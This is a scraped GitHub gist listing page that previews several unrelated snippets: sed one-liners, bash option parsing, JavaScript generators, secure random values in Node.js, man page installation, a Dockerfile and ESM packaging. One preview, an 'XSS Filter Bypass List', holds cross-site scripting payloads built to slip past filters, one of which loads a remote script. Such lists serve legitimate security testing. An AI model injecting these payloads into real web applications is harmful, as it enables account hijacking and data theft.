Skip to content

Instantly share code, notes, and snippets.

View micalevisk's full-sized avatar
🇧🇷
HTTP 499 ~ Adding bugs to programs.‏‏‎

Micael Levi L. Cavalcante micalevisk

🇧🇷
HTTP 499 ~ Adding bugs to programs.‏‏‎
View GitHub Profile
@r2k0
r2k0 / sed_snippets.sh
Last active September 30, 2024 11:05
sed examples
##FILE SPACING:
# double space a file
sed G
# double space a file which already has blank lines in it. Output file
# should contain no more than one blank line between lines of text.
sed '/^$/d;G'
# triple space a file
@cosimo
cosimo / parse-options.sh
Created September 21, 2012 09:31
Example of how to parse options with bash/getopt
#!/bin/bash
#
# Example of how to parse short/long options with 'getopt'
#
OPTS=`getopt -o vhns: --long verbose,dry-run,help,stack-size: -n 'parse-options' -- "$@"`
if [ $? != 0 ] ; then echo "Failed parsing options." >&2 ; exit 1 ; fi
echo "$OPTS"
@bmeck
bmeck / yield-star.js
Created February 10, 2014 05:29
Example of how to use yield* to combine generators
// Our incremental JSON parser (simplified only to use strings and arrays)
// while iterator result != done keep using .next(moreSrc) or .next(null) if you are done providing data
// while the iterator is not done it will return the state of the iterator
// the iterator is seeking more data to get a valid value
// call .next(str) to provide it more data
var NEED_MORE_DATA = 0;
// the iterator has a valid result and will return a result if you provide .next(null)
// this is not automatic, due to numbers and potentially invalid trailing characters after an expected end
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active November 12, 2024 09:17
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@joepie91
joepie91 / random.md
Last active November 7, 2024 16:48
Secure random values (in Node.js)

Not all random values are created equal - for security-related code, you need a specific kind of random value.

A summary of this article, if you don't want to read the entire thing:

  • Don't use Math.random(). There are extremely few cases where Math.random() is the right answer. Don't use it, unless you've read this entire article, and determined that it's necessary for your case.
  • Don't use crypto.getRandomBytes directly. While it's a CSPRNG, it's easy to bias the result when 'transforming' it, such that the output becomes more predictable.
  • If you want to generate random tokens or API keys: Use uuid, specifically the uuid.v4() method. Avoid node-uuid - it's not the same package, and doesn't produce reliably secure random values.
  • If you want to generate random numbers in a range: Use random-number-csprng.

You should seriously consider reading the entire article, though - it's

@dominikwilkowski
dominikwilkowski / Readme.md
Last active October 9, 2024 15:00
How to install a man page into a node.js app

How to install a man page into a node.js app

Cuttlebelle man page

Installing a man page is not easy as there are little infos out there about it.

After a lot of trial and error, google searches and alpha publishing my app I finally have a collection of things I need to do to get it working:

FROM alpine:latest
LABEL MAINTAINER="Faizan Bashir <[email protected]>"
# Linking of locale.h as xlocale.h
# This is done to ensure successfull install of python numpy package
# see https://forum.alpinelinux.org/comment/690#comment-690 for more information.
WORKDIR /var/www/
@sindresorhus
sindresorhus / esm-package.md
Last active November 15, 2024 15:20
Pure ESM package

Pure ESM package

The package that linked you here is now pure ESM. It cannot be require()'d from CommonJS.

This means you have the following choices:

  1. Use ESM yourself. (preferred)
    Use import foo from 'foo' instead of const foo = require('foo') to import the package. You also need to put "type": "module" in your package.json and more. Follow the below guide.
  2. If the package is used in an async context, you could use await import(…) from CommonJS instead of require(…).
  3. Stay on the existing version of the package until you can move to ESM.